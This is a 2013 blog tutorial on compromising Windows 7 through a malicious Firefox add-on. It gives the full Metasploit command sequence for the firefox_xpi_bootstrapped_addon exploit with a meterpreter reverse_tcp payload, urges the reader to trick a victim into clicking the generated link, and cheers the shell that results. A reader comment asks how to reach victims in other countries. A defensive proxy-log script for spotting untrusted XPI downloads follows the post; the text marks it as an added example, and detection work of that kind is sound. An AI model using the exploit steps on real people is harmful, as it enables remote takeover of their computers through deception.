Thursday, January 24, 2013

Hacking windows 7 with firefox addon

backtrack, backtrack 5, linux, hacking, tutorial, hacking tutorial, ethical hacking, pentest, penetration testing, pc, wpa, wpa2, metasploit, nmap, browser exploit


This exploit consists of creating an XPI add-on file. The victim's browser (Firefox) will pop up a dialog box asking the user whether he trusts the add-on. Once the user accepts the add-on installation, a payload with full user permissions will be executed on the victim machine.
First, we are going to open the Metasploit console:



root@bt:~# msfconsole






Now, we are going to use the mentioned exploit by typing:

msf > use exploit/multi/browser/firefox_xpi_bootstrapped_addon






Let's see what is required to set up the exploit:

msf > show options






We are going to choose "meterpreter" as our payload:


msf > set payload windows/meterpreter/reverse_tcp





Now, we have to set our local IP (you can run ifconfig to check which IP is yours):

msf > set lhost 192.168.1.2





Next, we set up the address of the local machine:

msf > set srvhost 192.168.1.2






Now, we set the uripath; you can name it whatever you like:

msf > set uripath firefox boost





Next, we choose our target by running this command:

msf > show targets






Since we are going to attack Windows 7, we will choose the second option:


msf > set target 1






Now, everything is ready for the attack:

msf > exploit





As you can see, a link has been generated for you. All that is left now is to social engineer the link to a victim and wait for a connection.

It seems a victim clicked on our link :-)




Bingooo!! A meterpreter session has been opened.
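From the defender's side, the delivery step above shows up in web proxy logs as an XPI download from a host that is not an approved add-on source. The following detection script is an added example, not part of the original post; the log format, the sample lines and the allowlist are constructed assumptions.

```python
import shlex
from urllib.parse import urlsplit

# Assumption: hosts your organisation accepts add-on installs from.
ALLOWED_XPI_HOSTS = {"addons.mozilla.org"}
XPI_MIME = "application/x-xpinstall"  # MIME type that triggers Firefox's install dialog

# Constructed sample proxy log: time client method url status "content-type"
SAMPLE_LOG = '''\
2013-01-24T10:01:02Z 192.168.1.7 GET https://addons.mozilla.org/firefox/downloads/file/1/ok.xpi 200 "application/x-xpinstall"
2013-01-24T10:03:40Z 192.168.1.9 GET http://192.168.1.2:8080/firefoxboost 200 "text/html"
2013-01-24T10:03:41Z 192.168.1.9 GET http://192.168.1.2:8080/firefoxboost/addon.xpi 200 "application/x-xpinstall"
2013-01-24T10:05:00Z 192.168.1.9 GET http://example.test/update 200 "application/x-xpinstall; charset=binary"
2013-01-24T10:06:00Z 192.168.1.5 GET http://example.test/index.html 200 "text/html"
malformed line
'''

def parse_line(line):
    """Return a dict for one log line, or None if it is malformed."""
    try:
        ts, client, method, url, status, ctype = shlex.split(line)
        status = int(status)
    except ValueError:
        return None
    # Drop MIME parameters such as "; charset=..." before comparing.
    return {"ts": ts, "client": client, "url": url, "status": status,
            "ctype": ctype.split(";")[0].strip().lower()}

def find_untrusted_xpi(log_text, allowed=ALLOWED_XPI_HOSTS):
    """List (time, client, host, path) for XPI responses from non-allowlisted hosts."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or rec["status"] != 200:
            continue
        parts = urlsplit(rec["url"])
        host = (parts.hostname or "").lower()
        # The served path is chosen by the sender, so match the MIME type
        # as well as the .xpi extension.
        is_xpi = rec["ctype"] == XPI_MIME or parts.path.lower().endswith(".xpi")
        if is_xpi and host not in allowed:
            hits.append((rec["ts"], rec["client"], host, parts.path))
    return hits

if __name__ == "__main__":
    for hit in find_untrusted_xpi(SAMPLE_LOG):
        print("untrusted XPI delivery:", *hit)
```

A hit identifies the client that was offered the add-on; whether the user accepted the install dialog has to be confirmed on the endpoint.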








1 comment:

  1. sir is this for only local network can't we do it from different areas or countries??
    waiting for your reply..
